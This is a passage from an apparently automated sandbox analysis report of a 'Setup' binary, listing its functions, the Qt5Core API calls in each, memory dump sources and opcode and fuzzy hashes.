                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-http
                                                                                                                                                              • API String ID: 475963459-3197784052
                                                                                                                                                              • Opcode ID: 36a5da7b9ce105b5e7865be1c403b06abba357b2cb97761589ca68bafe899a6e
                                                                                                                                                              • Instruction ID: 4894800cd532f632f69ea68d1e44365f2e06b8463be29db31bc9d8e823c44dc5
                                                                                                                                                              • Opcode Fuzzy Hash: 36a5da7b9ce105b5e7865be1c403b06abba357b2cb97761589ca68bafe899a6e
                                                                                                                                                              • Instruction Fuzzy Hash: 3811FB62A19A1699EF82CF74D8440FC23B1FF54759B844032DE5E16968EF3CE18ACB50
                                                                                                                                                              Function 00007FFBA1972AB7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-ftp
                                                                                                                                                              • API String ID: 475963459-2479258935
                                                                                                                                                              • Opcode ID: 3a68584a425a5551b06a62eb78bd4982679a0e98bc6d5354b8999998a628927c
                                                                                                                                                              • Instruction ID: 25b23c36e1e7c09fe1646001181b5c0903de7b959a694cecd199c28fdabb64a0
                                                                                                                                                              • Opcode Fuzzy Hash: 3a68584a425a5551b06a62eb78bd4982679a0e98bc6d5354b8999998a628927c
                                                                                                                                                              • Instruction Fuzzy Hash: D9110A62A09A1699EF82CF74D8400FC33B1FB54759B804032DE5E16A68EF3CE18ACB50
                                                                                                                                                              Function 00007FFBA19E7140 Relevance: 15.2, APIs: 10, Instructions: 167COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E7191
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E71AD
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E71C9
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E721A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E7264
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E727C
                                                                                                                                                              • ?qHash@@YAIAEBVQString@@I@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E72A7
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E72F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??8@String@@0@$Data@@HashNode@Node@1@$?first?nextHash@@String@@U21@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 472770931-0
                                                                                                                                                              • Opcode ID: f3e025adb8ae439b954cf2fbaa3e860575d7608587ea9348c42fceb0185e5e5e
                                                                                                                                                              • Instruction ID: c158c0b184326c5f74496ed3244ddc048121066ad3d27e580c17e897cf01d681
                                                                                                                                                              • Opcode Fuzzy Hash: f3e025adb8ae439b954cf2fbaa3e860575d7608587ea9348c42fceb0185e5e5e
                                                                                                                                                              • Instruction Fuzzy Hash: FA7189B6A0AB8186DBA5CB25F44026A77A1FB85BC8F444031DECE07799DF3CD456CB41
                                                                                                                                                              Function 00007FFBA1A3E1D0 Relevance: 15.2, APIs: 10, Instructions: 166timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A3E1ED
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E2B4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E324
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A3E32F
                                                                                                                                                              • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FFBA1A3E344
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E35B
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E369
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E391
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D3F0
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D407
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D41A
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D429
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D438
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E39F
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E424
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Array@@ByteV0@@$?dispose@?size@Data@1@@String@@$?at@DateEmpty@Logger@@MessageTime@@$?index?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 114117993-0
                                                                                                                                                              • Opcode ID: 159b953871c001e70db0b375270fe6e1127ff7d73d89528e52021a248f516f90
                                                                                                                                                              • Instruction ID: f90780375f6e2d0b1f927e24be39906b523b542aa9b5cb115f0965c18a4cd213
                                                                                                                                                              • Opcode Fuzzy Hash: 159b953871c001e70db0b375270fe6e1127ff7d73d89528e52021a248f516f90
                                                                                                                                                              • Instruction Fuzzy Hash: 6E71A676A0AA0686EFA28F21E4502BD7361FB80BA4F494037CE6E47754EF3CE445CB40
                                                                                                                                                              Function 00007FFBA19785F0 Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$??8@Array@@ByteNull@String@@0@$Object@@$?activate@Meta
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 168968883-0
                                                                                                                                                              • Opcode ID: 760bc68ac67a2b3903593b30f861ae92857236a924f29b4bb27677fa3ea1fdab
                                                                                                                                                              • Instruction ID: d30671465be6e38e53331d1f5df81fb1ff60cbe5f848dc04aa45f88be426cdc7
                                                                                                                                                              • Opcode Fuzzy Hash: 760bc68ac67a2b3903593b30f861ae92857236a924f29b4bb27677fa3ea1fdab
                                                                                                                                                              • Instruction Fuzzy Hash: F141526261DA8191EB91DF21E8446B96761FF84BD8F845032EE8F07A65DF3CD54ACF00
                                                                                                                                                              Function 00007FFBA1978AC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973171), ref: 00007FFBA1978B0F
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978B43
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA1978B5F
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA1978B7F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978B8F
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978BDE
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978C0B
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@ByteConverterFunction@Type@@$?registerInit_thread_footerType@$?has?normalizedAbstractCriticalEnterFlag@Flags@NormalizedObject@@Object@@@Private@@RegisteredSectionTypeType@@@@
                                                                                                                                                              • String ID: QList<QSslError>
                                                                                                                                                              • API String ID: 1000455719-3567200712
                                                                                                                                                              • Opcode ID: 101f4a1aa42a21c2234f67f78181bb3c423d321e7a6bbd3f69bbc0f22aabf0f3
                                                                                                                                                              • Instruction ID: 57682ba8f47f4788afb7b21bba3ca120577e162ef837528b4c6f21b1924986c3
                                                                                                                                                              • Opcode Fuzzy Hash: 101f4a1aa42a21c2234f67f78181bb3c423d321e7a6bbd3f69bbc0f22aabf0f3
                                                                                                                                                              • Instruction Fuzzy Hash: D23107B5A0EA42C6EB929B34E8401757361FF44768F804136DD6D836A6EF7CE90ACF44
                                                                                                                                                              Function 00007FFBA1975DE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA1975DFE
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE ref: 00007FFBA1975E12
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE ref: 00007FFBA1975E1F
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1975E4E
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1975E5E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1975E69
                                                                                                                                                                • Part of subcall function 00007FFBA1984060: ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1984084
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?getAndRef@ExternalRefCountData@QtSharedPointer@@SAPEAU12@PEBVQObject@@@Z.QT5CORE ref: 00007FFBA1978074
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197811F
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197812D
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197819F
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781AD
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19781D6
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781E1
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197820A
                                                                                                                                                                • Part of subcall function 00007FFBA1978050: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1978215
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA1975EB1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@Meta$Url@@$ConnectionType@$?setString@@$?connect?connect@Base@Impl@ObjectPrivate@@Qt@@Qt@@@SlotString@@@U3@@$?getCountData@ExternalHost@Latin1Mode@1@@Mutex@@Object@@@ParsingPointer@@Port@Ref@Scheme@SharedU12@V0@@
                                                                                                                                                              • String ID: preconnect-http
                                                                                                                                                              • API String ID: 3434442411-867629942
                                                                                                                                                              • Opcode ID: b5331ccc19341ecf2f7ae1ec346a91190f474b45fca11f446cc8a1f9e3a7ae3a
                                                                                                                                                              • Instruction ID: af7808c5c7d139fd542fda0f50127c17d5c664ec0655cc2d83b294c4acfad437
                                                                                                                                                              • Opcode Fuzzy Hash: b5331ccc19341ecf2f7ae1ec346a91190f474b45fca11f446cc8a1f9e3a7ae3a
                                                                                                                                                              • Instruction Fuzzy Hash: 80213DB261DA8682DB51DB25F4800AAA361FBC47A4F404032EE9E47A68EF7CD149CF40
                                                                                                                                                              Function 00007FFBA1977670 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49threadtimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?quit@QThread@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA197768B
                                                                                                                                                              • ??0QDeadlineTimer@@QEAA@_JW4TimerType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776A5
                                                                                                                                                              • ?wait@QThread@@QEAA_NVQDeadlineTimer@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776BB
                                                                                                                                                              • ?isFinished@QThread@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA19776C5
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA1977714
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1973701), ref: 00007FFBA197771F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@Thread@@$Connection@DeadlineMetaQt@@@Type@$?connect@?quit@?wait@ConnectionFinished@TimerTimer@@Timer@@@
                                                                                                                                                              • String ID: 1deleteLater()$2finished()
                                                                                                                                                              • API String ID: 2934167592-3963875448
                                                                                                                                                              • Opcode ID: b7c784f0690a79757fd1bf540912b184c017b88d2b98ae5e06ca652e59216dc9
                                                                                                                                                              • Instruction ID: 4c676df70af233f14d666f90b3c0f65fce49b709f5878823172a1b422210f48e
                                                                                                                                                              • Opcode Fuzzy Hash: b7c784f0690a79757fd1bf540912b184c017b88d2b98ae5e06ca652e59216dc9
                                                                                                                                                              • Instruction Fuzzy Hash: A1113B72A09B4282EB468F25E5540A97361FB88B98F844132DE9D07624DF3CE596CB00
                                                                                                                                                              Function 00007FFBA19A12A0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
